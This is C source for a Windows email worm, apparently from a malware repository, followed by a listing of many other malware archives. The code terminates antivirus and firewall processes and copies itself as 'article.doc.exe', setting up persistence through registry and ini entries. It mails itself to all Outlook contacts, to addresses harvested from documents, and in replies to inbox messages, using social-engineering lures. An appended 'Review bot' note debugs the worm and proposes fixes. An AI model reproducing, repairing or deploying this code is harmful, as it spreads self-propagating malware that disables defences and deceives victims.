LPSTR SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
BYTE desktop[50],favoris[50],personal[50],cache[50],page[150];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
DWORD type=REG_SZ;
FILE *vbsworm,*winstart;
HANDLE lSnapshot,myproc;
BOOL rProcessFound;
LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
WIN32_FIND_DATA ffile;
PROCESSENTRY32 uProcess;
HKEY hReg;
SYSTEMTIME wartime;
void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
// Kill Some AntiVirus
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
// Kill Some Worm
StopAV("KERN32.EXE"); // I-Worm.Badtrans
StopAV("SETUP.EXE"); // I-Worm.Cholera
StopAV("RUNDLLW32.EXE"); // I-Worm.Gift
StopAV("GONER.SCR"); // I-Worm.Goner
StopAV("LOAD.EXE"); // I-Worm.Nimda
StopAV("INETD.EXE"); // I-Worm.Plage - BadTrans
StopAV("FILES32.VXD"); // I-Worm.PrettyPark
StopAV("SCAM32.EXE"); // I-Worm.Sircam
StopAV("GDI32.EXE"); // I-Worm.Sonic
StopAV("_SETUP.EXE"); // I-Worm.ZippedFiles
StopAV("EXPLORE.EXE"); // I-Worm.ZippedFiles
StopAV("ZIPPED_FILES.EXE"); // I-Worm.ZippedFiles
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
SetCurrentDirectory(sysdir);
CopyFile(filename,"article.doc.exe",TRUE);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WarGames Worm",&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);
randomize();
num=rand() % 10;
randname:
strcat(copyr,alph[GetTickCount()%25]);
if(++counter==num) {
strcat(copyr,".exe");
MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
CopyFile(filename,copyr,FALSE);
WriteProfileString("WINDOWS","RUN",copyr);
WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
goto endrandname;
}
Sleep(GetTickCount()%100);
goto randname;
endrandname:
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(desktop,"*.doc");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(personal,"*.xls");
FindFile(personal,"*.asp");
FindFile(cache,".ht*");
FindFile(cache,".php");
FindFile(cache,".asp");
FindFile(winhtm,".ht*");
FindFile(winhtm,".doc");
vbsworm=fopen("wargames.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fclose(vbsworm);
ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(5000);
DeleteFile("wargames.vbs");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Re: Fw:";
mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n"
"I send you a nice program. Look at this.\n\n"
" See you soon.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filename;
mes->lpFiles->lpszFileName="funny.exe";
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
}
void FindFile(char *folder, char *ext)
{
register bool abc=TRUE;
register HANDLE hFile;
char mail[128];
SetCurrentDirectory(folder);
hFile=FindFirstFile(ext,&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
GetMail(ffile.cFileName,mail);
if(strlen(mail)>0) {
sendmail(mail);
}
abc=FindNextFile(hFile,&ffile);
}
}
}
void GetMail(char *namefile, char *mail)
{
HANDLE hf,hf2;
char *mapped;
DWORD size,i,k;
BOOL test=FALSE,valid=FALSE;
mail[0]=0;
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
void sendmail(char *tos)
{
memset(&mess,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));
wsprintf(subj,"Mail to %s.",tos);
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject=subj;
mess.lpszNoteText="I send you this patch.\n"
"It corrects a bug into Internet Explorer and Outlook.\n\n"
" Have a nice day. Best Regards.";
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="patch.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}
void StopAV(char *antivirus)
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,antivirus)!=NULL) {
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
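Review bot: The random-name loop at L2250-2263 never terminates when `rand() % 10` yields 0: `counter` starts at 0 and is pre-incremented, so `++counter==num` can never be true, and each pass appends another letter to `copyr[50]` with an unbounded `strcat`, overrunning the buffer within about 50 iterations; use `num = 1 + rand() % 10;` (and `%26` rather than `%25` at L2253 if 'z' was meant to be reachable). In the MAPI reply loop (L2353-2386) `strcpy(maddr, mes->lpOriginator->lpszAddress)` copies an address of arbitrary length into `maddr[30]` (and the name into `mname[50]`), and neither `lpOriginator` nor `lpRecips` is checked for NULL before being dereferenced; `lstrcpyn` with `sizeof` plus a NULL guard are needed. `mes->lpFiles` is malloc'd on every iteration but freed only once after the loop, and `mFreeBuffer(mes)` likewise releases only the last message. GetMail repeats the SingLung defects: it returns without `CloseHandle(hf)` at the `!size`/`size<8` checks, and `size-=100` wraps for files under 100 bytes so the scan runs past the mapping.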

15931
Win32/I-Worm.Win9x.Troodon.asm Normal file


2461
Win32/I-Worm.XTC.asm Normal file


BIN
Win32/MonsterWorm.7z Normal file


BIN
Win32/NytrojanByNytro.7z Normal file


BIN
Win32/OminousRAT.7z Normal file


BIN
Win32/PlutoniumByMr3amo.7z Normal file


BIN
Win32/RST.Trojan.7z Normal file



BIN
Win32/Win32.4HorseMan.a.7z Normal file


BIN
Win32/Win32.4HorseMan.b.7z Normal file


BIN
Win32/Win32.A59.7z Normal file


BIN
Win32/Win32.Acid.b.7z Normal file


BIN
Win32/Win32.Ago.c.7z Normal file


BIN
Win32/Win32.Ak.7z Normal file


BIN
Win32/Win32.Beta.7z Normal file


BIN
Win32/Win32.BlackDream.7z Normal file


BIN
Win32/Win32.Carberp.7z Normal file


BIN
Win32/Win32.Cyber.b.7z Normal file


BIN
Win32/Win32.D.a.7z Normal file


BIN
Win32/Win32.D.b.7z Normal file


BIN
Win32/Win32.DarkAnal.7z Normal file


BIN
Win32/Win32.Darkness.a.7z Normal file


BIN
Win32/Win32.Darkness.b.7z Normal file


BIN
Win32/Win32.EnglishRat.7z Normal file


BIN
Win32/Win32.ForBot.7z Normal file


BIN
Win32/Win32.FukJ.7z Normal file


BIN
Win32/Win32.Fungus.7z Normal file


BIN
Win32/Win32.Ganja.c.7z Normal file


BIN
Win32/Win32.Grum.7z Normal file


BIN
Win32/Win32.H.7z Normal file


BIN
Win32/Win32.Hell.7z Normal file


BIN
Win32/Win32.Hellbot.c.7z Normal file


BIN
Win32/Win32.Hidden.7z Normal file


BIN
Win32/Win32.Hydra.7z Normal file


BIN
Win32/Win32.IMBot.7z Normal file


BIN
Win32/Win32.Liquid.7z Normal file


BIN
Win32/Win32.Litmus.7z Normal file


BIN
Win32/Win32.Lolworm.7z Normal file


BIN
Win32/Win32.Nes.e.7z Normal file


BIN
Win32/Win32.Null.7z Normal file


BIN
Win32/Win32.Nzm.7z Normal file


BIN
Win32/Win32.Poshspy.7z Normal file


BIN
Win32/Win32.Pwnbot.7z Normal file


BIN
Win32/Win32.RBot.7z Normal file


BIN
Win32/Win32.Rage.7z Normal file


BIN
Win32/Win32.Reptile.7z Normal file


BIN
Win32/Win32.Riot.7z Normal file


BIN
Win32/Win32.Rose.c.7z Normal file


BIN
Win32/Win32.Rubilyn.7z Normal file


BIN
Win32/Win32.Ruff.7z Normal file


BIN
Win32/Win32.Rx.7z Normal file


BIN
Win32/Win32.S5.7z Normal file


BIN
Win32/Win32.Sd.7z Normal file


BIN
Win32/Win32.Sdx.7z Normal file


BIN
Win32/Win32.Shadow.7z Normal file


BIN
Win32/Win32.Shadow.a.7z Normal file


BIN
Win32/Win32.Shadow.b.7z Normal file


BIN
Win32/Win32.ShellbotFTP.7z Normal file



BIN
Win32/Win32.Skuz.7z Normal file


BIN
Win32/Win32.Small.7z Normal file


BIN
Win32/Win32.Spaz.b.7z Normal file


BIN
Win32/Win32.Steam.7z Normal file


BIN
Win32/Win32.Stolich.7z Normal file


BIN
Win32/Win32.Sv.7z Normal file


BIN
Win32/Win32.Tank.7z Normal file


BIN
Win32/Win32.TinyNuke.7z Normal file


BIN
Win32/Win32.Trochilus.7z Normal file


BIN
Win32/Win32.Tsgh.7z Normal file


BIN
Win32/Win32.Volk.7z Normal file


BIN
Win32/Win32.Wisdom.c.7z Normal file


BIN
Win32/Win32.Woodworm.7z Normal file


BIN
Win32/Win32.Ya.7z Normal file


BIN
Win32/Win32.Zemra.7z Normal file


BIN
Win32/Win32.Zero.7z Normal file


BIN
Win32/Win32.Zeus.a.7z Normal file


BIN
Win32/Win32.Zeus.b.7z Normal file


BIN
Win32/Win32.irBot.7z Normal file
